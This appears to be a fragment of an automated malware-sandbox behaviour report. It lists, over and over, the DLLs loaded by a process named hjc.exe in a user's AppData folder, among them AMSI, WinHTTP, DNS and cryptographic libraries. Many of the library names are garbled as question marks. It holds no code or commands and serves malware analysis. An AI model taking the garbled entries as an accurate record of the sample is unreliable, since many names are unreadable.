                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???y.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???y.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???y.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ????.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ????.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ????.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???2.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???2.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???2.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??????s.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??????s.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??????s.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: credssp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: bcrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
